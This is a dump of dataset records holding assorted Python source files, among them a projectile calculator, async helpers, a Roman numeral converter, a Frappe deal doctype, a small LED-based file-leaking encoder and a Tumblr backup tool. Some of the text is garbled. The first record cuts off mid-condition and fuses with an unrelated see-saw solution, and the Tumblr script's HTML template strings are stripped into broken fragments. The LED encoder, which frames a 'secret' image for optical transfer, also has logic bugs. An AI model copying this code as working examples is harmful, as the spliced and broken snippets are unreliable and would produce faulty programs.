+{"seq_id":"42915421115","text":"import math\nangulo=int(input('angulo: '))\nv=int(input('velocidade: '))\nd=(v**2)*math.sin(math.degrees(2*angulo))/9.8\nif 98<=d<100 and 1001:\n answer += math.comb(same[s], 2)\n \n return answer","repo_name":"KB-team3/AlgoGGang","sub_path":"길민지/Week_16/P152996_시소짝꿍.py","file_name":"P152996_시소짝꿍.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
+{"seq_id":"69840086134","text":"from functools import partial\r\n\r\ndef MakeFunc(func, callback):\r\n def Run(func, callback):\r\n callback(func())\r\n return partial(Run, func, callback)\r\n\r\nasync def AsyncRunAll(loop, funcs):\r\n futures = []\r\n for fn in funcs:\r\n futures.append(loop.run_in_executor(None, fn)) \r\n for f in futures:\r\n await f\r\n return","repo_name":"dk1027/PythonQuestradeBalanceChecker","sub_path":"FuncUtils.py","file_name":"FuncUtils.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17614394691","text":"import textwrap\nfrom bitstring import BitArray\n\nNUM_OF_LEDS = 8\nFRAMES_PER_SECOND = 5\nLEN_OF_MSG_LENGTH = 6\n\nRARE_ASCII = \"00011110\"\nNEW_RARE = \"00011111\"\n\ndef _get_start_protocol(content, num_of_leds):\n start_segments = ['1' * num_of_leds]\n length = [str(format(len(content), \"08b\"))]\n return start_segments + length\n\n\ndef _identify_start(byte_stream, num_of_leds):\n for i, byte in enumerate(byte_stream):\n if byte == \"1\" * num_of_leds:\n break\n return byte_stream[i + 1:]\n\n\ndef _split_bytes(bytes_to_split, segment_length):\n return textwrap.wrap(bytes_to_split, segment_length)\n\n\ndef _read_file(file_path):\n stream = b''\n with open(file_path, 'rb') as binary_file:\n for line in binary_file.readlines():\n stream += line\n return BitArray(stream).bin\n\n\ndef _get_msg_length(byte_stream):\n raw_length = byte_stream[0]\n length = int(raw_length, 2)\n msg = byte_stream[0:length]\n return length, msg\n\n\ndef bmp_to_raw(file_path, num_of_leds):\n with open(file_path, \"rb\") as file:\n stream = file.read()\n content = textwrap.wrap(BitArray(stream).bin, num_of_leds)\n without_thrity = change_to_thirty(content)\n finished_data = replace_repeats(without_thrity)\n start = _get_start_protocol(finished_data, num_of_leds)\n return finished_data + content\n\n\ndef raw_to_bmp(byte_stream):\n hexed_data = [bytes([byte]) for byte in byte_stream]\n with open(\"leaked_img.bmp\", 'wb') as file:\n for h in hexed_data:\n file.write(h)\n\n\ndef change_to_thirty(stream):\n new_stream = []\n for byte in stream:\n if byte == RARE_ASCII:\n new_stream.append(NEW_RARE)\n else:\n new_stream.append(byte)\n return new_stream\n\n\ndef replace_repeats(stream):\n new_stream = []\n new_stream.append(stream[0])\n for i in range(1, len(stream)):\n if stream[i] == new_stream[i - 1]:\n new_stream.append(RARE_ASCII)\n else:\n new_stream.append(stream[i])\n return new_stream\n\n\ndef data_to_raw(file_path, num_of_leds):\n content = _split_bytes(_read_file(file_path), NUM_OF_LEDS)\n without_thrity = change_to_thirty(content)\n finished_data = replace_repeats(without_thrity)\n start = _get_start_protocol(finished_data, num_of_leds)\n return start + finished_data\n\n\ndef raw_to_data(byte_stream):\n decoded_msg = [chr(byte) for byte in byte_stream]\n return \"\".join(decoded_msg)\n\n\na = bmp_to_raw(r\"C:\\Users\\t8875881\\Desktop\\usb\\secret_img.bmp\", 8)","repo_name":"Savioor/sprint2","sub_path":"protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"15705592383","text":"# Day 21 - Problem 24\r\n\r\n# Challenge\r\n# Write a Python class to convert a roman numeral to an integer.\r\n\r\n# Example\r\n\"\"\"\r\nSample input\r\n'MMMCMLXXXVI'\r\n'MMMM'\r\n'C'\r\n\r\nSample output\r\n3986\r\n4000\r\n100\r\n\"\"\"\r\n\r\n\r\nclass Conversion:\r\n \"\"\"\r\n Class to handle the conversion of numbers across different numeral system.\r\n \"\"\"\r\n def convert_roman_to_int(self, input):\r\n roman_values = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\r\n result = 0\r\n for i in range(len(input)):\r\n if (i > 0) and (roman_values[input[i]] > roman_values[input[i - 1]]):\r\n result += roman_values[input[i]] - 2 * roman_values[input[i - 1]]\r\n else:\r\n result += roman_values[input[i]]\r\n return result\r\n\r\n\r\nconversion = Conversion()\r\nprint(conversion.convert_roman_to_int('MMMCMLXXXVI'))\r\nprint(conversion.convert_roman_to_int('MMMM'))\r\nprint(conversion.convert_roman_to_int('C'))\r\n","repo_name":"jeffreytjs/100DayOfCode","sub_path":"class/convert_to_int.py","file_name":"convert_to_int.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"20451876714","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\na = Analysis(['src\\\\git-watch.py'],\n pathex=['C:\\\\Users\\\\jacob\\\\git\\\\git-watch'],\n binaries=[],\n datas=[],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\n\na.datas += [ ('src/assets/icon.ico', '.\\\\src\\\\assets\\\\icon.ico', 'DATA') ]\n\npyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)\n\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='git-watch',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=False)\n\nimport shutil\nshutil.copyfile('config.cfg', '{0}/config.cfg'.format(DISTPATH))\n\n","repo_name":"jbmadsen/git-watch","sub_path":"git-watch-build.spec","file_name":"git-watch-build.spec","file_ext":"spec","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"7934410949","text":"import funcx_web_service\n\nTEST_CONFIG = \"\"\"\\\nFOO = \"bar\"\nSECRET_VALUE = \"blah\"\nBOOL_VALUE = False\nCONTAINER_SERVICE_ENABLED = False\n\"\"\"\n\n\ndef test_read_from_config(tmp_path, monkeypatch):\n conf_file = tmp_path / \"test.config\"\n conf_file.write_text(TEST_CONFIG)\n monkeypatch.setenv(\"APP_CONFIG_FILE\", str(conf_file))\n\n app = funcx_web_service.create_app()\n assert app.config[\"FOO\"] == \"bar\"\n assert app.config[\"SECRET_VALUE\"] == \"blah\"\n assert not app.config[\"BOOL_VALUE\"]\n\n monkeypatch.setenv(\"SECRET_VALUE\", \"shhh\")\n monkeypatch.setenv(\"BOOL_VALUE\", \"true\")\n app_from_env = funcx_web_service.create_app()\n assert app_from_env.config[\"SECRET_VALUE\"] == \"shhh\"\n assert app_from_env.config[\"BOOL_VALUE\"]\n","repo_name":"funcx-faas/funcx-web-service","sub_path":"tests/unit/test_app_init.py","file_name":"test_app_init.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"}
+{"seq_id":"33174465830","text":"import frappe,json\nfrom frappe.model.document import Document\n#from frappe.custom.doctype.custom_field.custom_field import create_custom_fields\n\nclass DealFinalize(Document):\n\tdef before_save(self):\n\t\tif self.saved:\n\t\t\tinitial_item={}\n\t\t\ti_item=[]\n\t\t\tfor row in self.deal_initiate:\n\t\t\t\ti_item.append(row.item_code)\n\t\t\t\tinitial_item[row.item_code]=row.qty\n\t\t\tfinal_item={}\n\t\t\tf_item=[]\n\t\t\tfor row in self.items:\n\t\t\t\t#row.amount=(row.qty*row.rate)\n\t\t\t\t#row.rate=row.rate/self.conversion_rate\n\t\t\t\tf_item.append(row.item_code)\n\t\t\t\tif row.item_code not in final_item:\n\t\t\t\t\t#frappe.throw(\"Item missing in table Deal Finalize \" f'{row.item_code}')\n\t\t\t\t\tfinal_item[row.item_code]=[float(row.qty)]\n\t\t\t\telse:\n\t\t\t\t\tfinal_item[row.item_code].append(float(row.qty))\n\t\t\tif not f_item:\n\t\t\t\tfrappe.throw(\"Deal Finalize Table is Empty\")\n\t\t\tr_m_item=\"\"\n\t\t\tfor row in initial_item:\n\t\t\t\tif row not in final_item:\n\t\t\t\t\tr_item=float(initial_item[row])\n\t\t\t\t\tr_m_item+=(f'for item \"{row}\" : Remaining Quantity - {r_item} ')\n\t\t\t\t#if not row in final_item:\n\t\t\t\t#\tr_m_item+=(f'For Item \"{row}\" : Remaining Quantity - {initial_item[row]} Needs to be Filled')\n\t\t\t\telif row in final_item and float(initial_item[row])!=float(sum(final_item[row])):\n\t\t\t\t\tfrappe.errprint(i_item)\n\t\t\t\t\tfrappe.errprint(f_item)\n\t\t\t\t\tr_item=float(initial_item[row])-float(sum(final_item[row]))\n\t\t\t\t\tr_m_item+=(f'for item \"{row}\" : Remaining Quantity - {r_item} ')\n\t\t\tif r_m_item:\n\t\t\t\tfrappe.throw(\"Total value is not matching,
\" f'{r_m_item}')\n\t\telse:\n\t\t\tself.saved=1\n\tdef before_submit(self):\n\t\tself.before_save()\n\n@frappe.whitelist()\ndef get_rate(item,dn):\n\trate=frappe.db.get_value(\"Deal Initiate Item\",{\"parent\":dn,\"item_code\":item},\"rate\")\n\t#frappe.errprint(rate)\n\treturn rate\n\n\n\n@frappe.whitelist()\ndef make_indent(val,supplier,date,currency,price_list,name):\n\tval=json.loads(val)\n#\tfrappe.errprint(val)\n\tif not val:\n\t\tfrappe.throw(\"No rows selected\")\n\tp_details={}\n\t#frappe.errprint(val)\n\t#for row in val:\n\t#\tif row[\"payment_terms\"] == \"LC @ Sight\":\n\t#\t\trow[\"payment_terms\"]=\"LC\"\n\t#frappe.errprint(val)\n\tfor row in val:\n\t\tif row[\"payment_terms\"] not in p_details:\n\t\t\tp_details[row['payment_terms']]=[row[\"buyer\"]]\n\t\telif row['buyer'] not in p_details[row['payment_terms']]:\n\t\t\tp_details[row['payment_terms']].append(row[\"buyer\"])\n\t\t\t#p_term=row['payment_terms']\n\t\t\t#frappe.throw(\"Buyer not matching for \"f'{p_term}')\n\t#frappe.errprint(p_details)\n\tr_m_buyer=\"\"\n\tfor row in p_details:\n\t\tif(len(set(p_details[row]))>1):\n\t\t\tr_m_buyer+=(f'{row} ')\n\tif r_m_buyer:\n\t\tfrappe.throw(\"Buyer's not matching for Payment Terms
', 'html.parser')\n tags.insert(i, soup)\n\n card = ARTICLE_CARD.format(title=article.title, tags=tags.prettify(),\n date=article.date.strftime('%Y-%m-%d'), readable_date=article.date.strftime('%B %d, %Y'),\n summary=article.summary.prettify(), article_link=article.path)\n return BeautifulSoup(card, 'html.parser')\n\n\ndef build_cards(articles):\n built = BeautifulSoup('', 'html.parser')\n container = built.contents[0]\n\n for i, article in enumerate(articles):\n container.insert(i, build_card(article))\n\n return built\n\n\ndef write(html, title, file_path):\n with open(f'{TEMPLATES_DIR}/head.html', 'r') as f:\n head = f.read()\n\n with open(f'{TEMPLATES_DIR}/tail.html', 'r') as f:\n tail = f.read()\n\n full_html = BeautifulSoup(head + html + tail, 'html.parser')\n title_html = full_html.find('title')\n title_html.clear()\n title_html.insert(0, title)\n with open(file_path, 'w') as f:\n f.write(full_html.prettify())\n\n\ndef build_tag_page(tag, articles):\n cards = build_cards(articles)\n heading = f'Tag: {tag}'\n\n container = cards.find('div', attrs={'class': 'container'})\n tag_heading = BeautifulSoup(f'
{heading}
', 'html.parser')\n container.insert(0, tag_heading)\n\n write(cards.prettify(), f\"{heading} | Layog's blog\",\n f'{SRC_DIR}/tag/{tag.lower()}.html')\n\n\ndef build_tags_pages(articles):\n all_tags = {}\n for article in articles:\n for tag in article.tags:\n all_tags.setdefault(tag.lower(), ([], []))\n all_tags[tag.lower()][0].append(tag)\n all_tags[tag.lower()][1].append(article)\n\n for tag, (representations, articles) in all_tags.items():\n if len(set(representations)) > 1:\n print(\"WARNING: There are multiple representations for tag {}: {}\".format(tag, \", \".join(representations)))\n\n build_tag_page(representations[0], articles)\n\n lower_tags = list(all_tags.keys())\n lower_tags.sort(key=lambda x: (len(all_tags[x][1]), x))\n\n tags = BeautifulSoup('', 'html.parser')\n for i, tag in enumerate(lower_tags):\n rep = all_tags[tag][0][0]\n count = len(all_tags[tag][1])\n soup = BeautifulSoup(f'
', ''])\n with open_text(tag_index_dir, dir_index) as f:\n f.write(u'\\n'.join(tag_index))\n\n\nclass TumblrBackup(object):\n def __init__(self):\n self.failed_blogs = []\n self.total_count = 0\n self.post_count = 0\n self.filter_skipped = 0\n self.title = None # type: Optional[Text]\n self.subtitle = None # type: Optional[str]\n\n def exit_code(self):\n if self.failed_blogs:\n return EXIT_ERRORS\n if self.total_count == 0:\n return EXIT_NOPOSTS\n return EXIT_SUCCESS\n\n def header(self, title='', body_class='', subtitle='', avatar=False):\n root_rel = {\n 'index': '', 'tag-index': '..', 'tag-archive': '../..'\n }.get(body_class, save_dir)\n css_rel = urlpathjoin(root_rel, custom_css if have_custom_css else backup_css)\n if body_class:\n body_class = ' class=' + body_class\n h = u'''\n\n\n%s\n\n\n\n\n\n''' % (FILE_ENCODING, self.title, css_rel, body_class)\n if avatar:\n f = glob(path_to(theme_dir, avatar_base + '.*'))\n if f:\n h += '\\n'.format(urlpathjoin(root_rel, theme_dir, split(f[0])[1]))\n if title:\n h += u'
%s
\\n' % title\n if subtitle:\n h += u'
%s
\\n' % subtitle\n h += '\\n'\n return h\n\n @staticmethod\n def footer(base, previous_page, next_page):\n f = '\\n'\n return f\n\n @staticmethod\n def get_post_timestamps(posts):\n for post in posts:\n with io.open(post, encoding=FILE_ENCODING) as pf:\n soup = BeautifulSoup(pf, 'lxml')\n postdate = soup.find('time')['datetime']\n del soup\n # No datetime.fromisoformat or datetime.timestamp on Python 2\n yield (datetime.strptime(postdate, '%Y-%m-%dT%H:%M:%SZ') - datetime(1970, 1, 1)) // timedelta(seconds=1)\n\n def backup(self, account, prev_archive):\n \"\"\"makes single files and an index for every post on a public Tumblr blog account\"\"\"\n\n base = get_api_url(account)\n\n # make sure there are folders to save in\n global save_folder, media_folder, post_ext, post_dir, save_dir, have_custom_css\n if options.blosxom:\n save_folder = root_folder\n post_ext = '.txt'\n post_dir = os.curdir\n post_class = BlosxomPost # type: Type[TumblrPost]\n else:\n save_folder = join(root_folder, options.outdir or account)\n media_folder = path_to(media_dir)\n if options.dirs:\n post_ext = ''\n save_dir = '../..'\n mkdir(path_to(post_dir), recursive=True)\n else:\n mkdir(save_folder, recursive=True)\n post_class = TumblrPost\n have_custom_css = os.access(path_to(custom_css), os.R_OK)\n\n self.post_count = 0\n self.filter_skipped = 0\n\n # get the highest post id already saved\n ident_max = None\n if options.incremental:\n filter_ = join('*', dir_index) if options.dirs else '*' + post_ext\n post_glob = glob(path_to(post_dir, filter_))\n if not post_glob:\n pass # No posts to read\n elif options.likes:\n # Read every post to find the newest timestamp we've saved.\n if BeautifulSoup is None:\n raise RuntimeError(\"Incremental likes backup: module 'bs4' is not installed\")\n logger.warn('Finding newest liked post (may take a while)\\n', account=True)\n ident_max = max(self.get_post_timestamps(post_glob))\n else:\n ident_max = max(long(splitext(split(f)[1])[0]) for f in post_glob)\n if ident_max is not None:\n logger.info('Backing up posts after {}\\n'.format(ident_max), account=True)\n\n logger.status('Getting basic information\\r')\n\n api_parser = ApiParser(base, account)\n if prev_archive:\n api_parser.read_archive(prev_archive)\n resp = api_parser.apiparse(1)\n if not resp:\n self.failed_blogs.append(account)\n return\n\n # collect all the meta information\n if options.likes:\n if not resp.get('blog', {}).get('share_likes', True):\n logger.error('{} does not have public likes\\n'.format(account))\n self.failed_blogs.append(account)\n return\n posts_key = 'liked_posts'\n blog = {}\n count_estimate = resp['liked_count']\n else:\n posts_key = 'posts'\n blog = resp.get('blog', {})\n count_estimate = blog.get('posts')\n self.title = escape(blog.get('title', account))\n self.subtitle = blog.get('description', '')\n\n # use the meta information to create a HTML header\n TumblrPost.post_header = self.header(body_class='post')\n\n # start the thread pool\n backup_pool = ThreadPool()\n\n oldest_date = None\n\n # returns whether any posts from this batch were saved\n def _backup(posts, post_respfiles):\n def sort_key(x): return x[0]['liked_timestamp'] if options.likes else long(x[0]['id'])\n sorted_posts = sorted(zip(posts, post_respfiles), key=sort_key, reverse=True)\n for p, prf in sorted_posts:\n no_internet.check()\n post = post_class(p, account, prf, prev_archive)\n oldest_date = post.date\n if ident_max is None:\n pass # No limit\n elif (p['liked_timestamp'] if options.likes else long(post.ident)) <= ident_max:\n logger.info('Stopping backup: Incremental backup complete\\n', account=True)\n return False, oldest_date\n if options.period:\n if post.date > options.p_stop:\n raise RuntimeError('Found post with date ({}) newer than before param ({})'.format(\n post.date, options.p_stop))\n if post.date < options.p_start:\n logger.info('Stopping backup: Reached end of period\\n', account=True)\n return False, oldest_date\n if options.request:\n if post.typ not in options.request:\n continue\n tags = options.request[post.typ]\n if not (TAG_ANY in tags or tags & post.tags_lower):\n continue\n if options.no_reblog:\n if 'reblogged_from_name' in p or 'reblogged_root_name' in p:\n if 'trail' in p and not p['trail']:\n continue\n if 'trail' in p and 'is_current_item' not in p['trail'][-1]:\n continue\n elif 'trail' in p and p['trail'] and 'is_current_item' not in p['trail'][-1]:\n continue\n if os.path.exists(path_to(*post.get_path())) and options.no_post_clobber:\n continue # Post exists and no-clobber enabled\n if options.filter and not options.filter.input(p).first():\n self.filter_skipped += 1\n continue\n\n while True:\n try:\n backup_pool.add_work(post.save_content, timeout=0.1)\n break\n except queue.Full:\n pass\n no_internet.check()\n\n self.post_count += 1\n if options.count and self.post_count >= options.count:\n logger.info('Stopping backup: Reached limit of {} posts\\n'.format(options.count), account=True)\n return False, oldest_date\n return True, oldest_date\n\n try:\n # Get the JSON entries from the API, which we can only do for MAX_POSTS posts at once.\n # Posts \"arrive\" in reverse chronological order. Post #0 is the most recent one.\n i = options.skip\n before = options.p_stop if options.period else None\n while True:\n # find the upper bound\n logger.status('Getting {}posts {} to {}{}\\r'.format(\n 'liked ' if options.likes else '', i, i + MAX_POSTS - 1,\n '' if count_estimate is None else ' (of {} expected)'.format(count_estimate),\n ))\n\n resp = api_parser.apiparse(MAX_POSTS, i, before)\n if resp is None:\n self.failed_blogs.append(account)\n break\n\n posts = resp[posts_key]\n if not posts:\n logger.info('Backup complete: Found empty set of posts\\n', account=True)\n break\n\n post_respfiles = resp.get('post_respfiles')\n if post_respfiles is None:\n post_respfiles = [None for _ in posts]\n res, oldest_date = _backup(posts, post_respfiles)\n if not res:\n break\n\n if options.likes:\n next_ = resp['_links'].get('next')\n if next_ is None:\n logger.info('Backup complete: Found end of likes\\n', account=True)\n break\n before = int(next_['query_params']['before'])\n elif before is not None:\n assert oldest_date <= before\n if oldest_date == before:\n oldest_date -= 1\n before = oldest_date\n i += MAX_POSTS\n except:\n # ensure proper thread pool termination\n backup_pool.cancel()\n raise\n\n # wait until all posts have been saved\n backup_pool.wait()\n\n # postprocessing\n if not options.blosxom and (self.post_count or options.count == 0):\n logger.status('Getting avatar and style\\r')\n get_avatar(prev_archive)\n get_style(prev_archive)\n if not have_custom_css:\n save_style()\n logger.status('Building index\\r')\n ix = Indices(self)\n ix.build_index()\n ix.save_index()\n\n logger.status(None)\n skipped_msg = (', {} did not match filter'.format(self.filter_skipped)) if self.filter_skipped else ''\n logger.warn(\n '{} {}posts backed up{}\\n'.format(self.post_count, 'liked ' if options.likes else '', skipped_msg),\n account=True,\n )\n self.total_count += self.post_count\n\n\nclass TumblrPost(object):\n post_header = '' # set by TumblrBackup.backup()\n\n def __init__(self, post, backup_account, respfile, prev_archive):\n # type: (JSONDict, str, Text, Text) -> None\n self.content = ''\n self.post = post\n self.backup_account = backup_account\n self.respfile = respfile\n self.prev_archive = prev_archive\n self.creator = post.get('blog_name') or post['tumblelog']\n self.ident = str(post['id'])\n self.url = post['post_url']\n self.shorturl = post['short_url']\n self.typ = str(post['type'])\n self.date = post['liked_timestamp' if options.likes else 'timestamp'] # type: float\n self.isodate = datetime.utcfromtimestamp(self.date).isoformat() + 'Z'\n self.tm = time.localtime(self.date)\n self.title = u''\n self.tags = post['tags']\n self.note_count = post.get('note_count')\n if self.note_count is None:\n self.note_count = post.get('notes', {}).get('count')\n if self.note_count is None:\n self.note_count = 0\n self.reblogged_from = post.get('reblogged_from_url')\n self.reblogged_root = post.get('reblogged_root_url')\n self.source_title = post.get('source_title', '')\n self.source_url = post.get('source_url', '')\n self.tags_lower = None # type: Optional[Set[str]]\n if options.request:\n self.tags_lower = {t.lower() for t in self.tags}\n self.file_name = join(self.ident, dir_index) if options.dirs else self.ident + post_ext\n self.llink = self.ident if options.dirs else self.file_name\n self.media_dir = join(post_dir, self.ident) if options.dirs else media_dir\n self.media_url = urlpathjoin(save_dir, self.media_dir)\n self.media_folder = path_to(self.media_dir)\n\n def save_content(self):\n \"\"\"generates the content for this post\"\"\"\n post = self.post\n content = []\n\n def append(s, fmt=u'%s'):\n content.append(fmt % s)\n\n def get_try(elt):\n return post.get(elt, '')\n\n def append_try(elt, fmt=u'%s'):\n elt = get_try(elt)\n if elt:\n if options.save_images:\n elt = re.sub(r'''(?i)(]*\\s)?src\\s*=\\s*[\"'])(.*?)([\"'][^>]*>)''',\n self.get_inline_image, elt\n )\n if options.save_video or options.save_video_tumblr:\n # Handle video element poster attribute\n elt = re.sub(r'''(?i)(', post[footer_pos:])\n parts = post_file.split(os.sep)\n if parts[-1] == dir_index: # ...//index.html\n self.file_name = join(*parts[-2:])\n self.ident = parts[-2]\n else:\n self.file_name = parts[-1]\n self.ident = splitext(self.file_name)[0]\n self.date = os.stat(post_file).st_mtime # type: float\n self.tm = time.localtime(self.date)\n\n def get_post(self, in_tag_index):\n with io.open(self.post_file, encoding=FILE_ENCODING) as f:\n post = f.read()\n # remove header and footer\n lines = post.split('\\n')\n while lines and '' not in lines[-1]:\n del lines[-1]\n post = '\\n'.join(lines)\n if in_tag_index:\n # fixup all media links which now have to be two folders lower\n shallow_media = urlpathjoin('..', media_dir)\n deep_media = urlpathjoin(save_dir, media_dir)\n post = post.replace(shallow_media, deep_media)\n return post\n\n\nclass ThreadPool(object):\n def __init__(self, thread_count=20, max_queue=1000):\n self.queue = LockedQueue(threading.RLock(), max_queue) # type: LockedQueue[Callable[[], None]]\n self.quit = threading.Event()\n self.abort = threading.Event()\n self.threads = [threading.Thread(target=self.handler) for _ in range(thread_count)]\n for t in self.threads:\n t.start()\n\n def add_work(self, *args, **kwargs):\n self.queue.put(*args, **kwargs)\n\n def wait(self):\n logger.status('{} remaining posts to save\\r'.format(self.queue.qsize()))\n self.quit.set()\n while True:\n with self.queue.all_tasks_done:\n if not self.queue.unfinished_tasks:\n break\n self.queue.all_tasks_done.wait(timeout=0.1)\n no_internet.check()\n\n def cancel(self):\n self.abort.set()\n no_internet.destroy()\n for i, t in enumerate(self.threads, start=1):\n logger.status('Stopping threads {}{}\\r'.format(' ' * i, '.' * (len(self.threads) - i)))\n t.join()\n\n with self.queue.mutex:\n self.queue.queue.clear()\n self.queue.all_tasks_done.notify_all()\n\n def handler(self):\n while not self.abort.is_set():\n with self.queue.mutex:\n try:\n work = self.queue.get(block=not self.quit.is_set(), timeout=0.1)\n except queue.Empty:\n if self.quit.is_set():\n break\n continue\n qsize = self.queue.qsize()\n\n if self.quit.is_set() and qsize % REM_POST_INC == 0:\n logger.status('{} remaining posts to save\\r'.format(qsize))\n\n try:\n work()\n finally:\n self.queue.task_done()\n\n\nif __name__ == '__main__':\n # The default of 'fork' can cause deadlocks, even on Linux\n # See https://bugs.python.org/issue40399\n if not PY3:\n pass # No set_start_method. Here be dragons\n elif 'forkserver' in multiprocessing.get_all_start_methods():\n multiprocessing.set_start_method('forkserver') # Fastest safe option, if supported\n else:\n multiprocessing.set_start_method('spawn') # Slow but safe\n\n no_internet.setup()\n\n import argparse\n\n class CSVCallback(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, set(values.split(',')))\n\n class CSVListCallback(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, list(values.split(',')))\n\n class RequestCallback(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n request = getattr(namespace, self.dest) or {}\n for req in values.lower().split(','):\n parts = req.strip().split(':')\n typ = parts.pop(0)\n if typ != TYPE_ANY and typ not in POST_TYPES:\n parser.error(\"{}: invalid post type '{}'\".format(option_string, typ))\n for typ in POST_TYPES if typ == TYPE_ANY else (typ,):\n if parts:\n request[typ] = request.get(typ, set()).union(parts)\n else:\n request[typ] = {TAG_ANY}\n setattr(namespace, self.dest, request)\n\n class TagsCallback(RequestCallback):\n def __call__(self, parser, namespace, values, option_string=None):\n super(TagsCallback, self).__call__(\n parser, namespace, TYPE_ANY + ':' + values.replace(',', ':'), option_string,\n )\n\n parser = argparse.ArgumentParser(usage='%(prog)s [options] blog-name ...',\n description='Makes a local backup of Tumblr blogs.')\n parser.add_argument('-O', '--outdir', help='set the output directory (default: blog-name)')\n parser.add_argument('-D', '--dirs', action='store_true', help='save each post in its own folder')\n parser.add_argument('-q', '--quiet', action='store_true', help='suppress progress messages')\n parser.add_argument('-i', '--incremental', action='store_true', help='incremental backup mode')\n parser.add_argument('-l', '--likes', action='store_true', help=\"save a blog's likes, not its posts\")\n parser.add_argument('-k', '--skip-images', action='store_false', dest='save_images',\n help='do not save images; link to Tumblr instead')\n parser.add_argument('--save-video', action='store_true', help='save all video files')\n parser.add_argument('--save-video-tumblr', action='store_true', help='save only Tumblr video files')\n parser.add_argument('--save-audio', action='store_true', help='save audio files')\n parser.add_argument('--save-notes', action='store_true', help='save a list of notes for each post')\n parser.add_argument('--copy-notes', action='store_true', help='copy the notes list from a previous archive')\n parser.add_argument('--notes-limit', type=int, metavar='COUNT', help='limit requested notes to COUNT, per-post')\n parser.add_argument('--cookiefile', help='cookie file for youtube-dl, --save-notes, and svc API')\n parser.add_argument('-j', '--json', action='store_true', help='save the original JSON source')\n parser.add_argument('-b', '--blosxom', action='store_true', help='save the posts in blosxom format')\n parser.add_argument('-r', '--reverse-month', action='store_false',\n help='reverse the post order in the monthly archives')\n parser.add_argument('-R', '--reverse-index', action='store_false', help='reverse the index file order')\n parser.add_argument('--tag-index', action='store_true', help='also create an archive per tag')\n parser.add_argument('-a', '--auto', type=int, metavar='HOUR',\n help='do a full backup at HOUR hours, otherwise do an incremental backup'\n ' (useful for cron jobs)')\n parser.add_argument('-n', '--count', type=int, help='save only COUNT posts')\n parser.add_argument('-s', '--skip', type=int, default=0, help='skip the first SKIP posts')\n parser.add_argument('-p', '--period', help=\"limit the backup to PERIOD ('y', 'm', 'd' or YYYY[MM[DD]])\")\n parser.add_argument('-N', '--posts-per-page', type=int, default=50, metavar='COUNT',\n help='set the number of posts per monthly page, 0 for unlimited')\n parser.add_argument('-Q', '--request', action=RequestCallback,\n help=u'save posts matching the request TYPE:TAG:TAG:…,TYPE:TAG:…,…. '\n u'TYPE can be {} or {any}; TAGs can be omitted or a colon-separated list. '\n u'Example: -Q {any}:personal,quote,photo:me:self'\n .format(u', '.join(POST_TYPES), any=TYPE_ANY))\n parser.add_argument('-t', '--tags', action=TagsCallback, dest='request',\n help='save only posts tagged TAGS (comma-separated values; case-insensitive)')\n parser.add_argument('-T', '--type', action=RequestCallback, dest='request',\n help='save only posts of type TYPE (comma-separated values from {})'\n .format(', '.join(POST_TYPES)))\n parser.add_argument('-F', '--filter', help='save posts matching a jq filter (needs jq module)')\n parser.add_argument('--no-reblog', action='store_true', help=\"don't save reblogged posts\")\n parser.add_argument('-I', '--image-names', choices=('o', 'i', 'bi'), default='o', metavar='FMT',\n help=\"image filename format ('o'=original, 'i'=, 'bi'=_)\")\n parser.add_argument('-e', '--exif', action=CSVCallback, default=set(), metavar='KW',\n help='add EXIF keyword tags to each picture'\n \" (comma-separated values; '-' to remove all tags, '' to add no extra tags)\")\n parser.add_argument('-S', '--no-ssl-verify', action='store_true', help='ignore SSL verification errors')\n parser.add_argument('--prev-archives', action=CSVListCallback, default=[], metavar='DIRS',\n help='comma-separated list of directories (one per blog) containing previous blog archives')\n parser.add_argument('--no-post-clobber', action='store_true', help='Do not re-download existing posts')\n parser.add_argument('--no-server-timestamps', action='store_false', dest='use_server_timestamps',\n help=\"don't set local timestamps from HTTP headers\")\n parser.add_argument('--hostdirs', action='store_true', help='Generate host-prefixed directories for media')\n parser.add_argument('--user-agent', help='User agent string to use with HTTP requests')\n parser.add_argument('blogs', nargs='*')\n options = parser.parse_args()\n\n if options.auto is not None and options.auto != time.localtime().tm_hour:\n options.incremental = True\n if options.period:\n try:\n pformat = {'y': '%Y', 'm': '%Y%m', 'd': '%Y%m%d'}[options.period]\n options.period = time.strftime(pformat)\n except KeyError:\n options.period = options.period.replace('-', '')\n if not re.match(r'^\\d{4}(\\d\\d)?(\\d\\d)?$', options.period):\n parser.error(\"Period must be 'y', 'm', 'd' or YYYY[MM[DD]]\")\n set_period()\n\n wget_retrieve = WgetRetrieveWrapper(options, logger.log)\n setup_wget(not options.no_ssl_verify, options.user_agent)\n\n blogs = options.blogs or DEFAULT_BLOGS\n if not blogs:\n parser.error(\"Missing blog-name\")\n if options.count is not None and options.count < 0:\n parser.error('--count: count must not be negative')\n if options.count == 0 and (options.incremental or options.auto is not None):\n parser.error('--count 0 conflicts with --incremental and --auto')\n if options.skip < 0:\n parser.error('--skip: skip must not be negative')\n if options.posts_per_page < 0:\n parser.error('--posts-per-page: posts per page 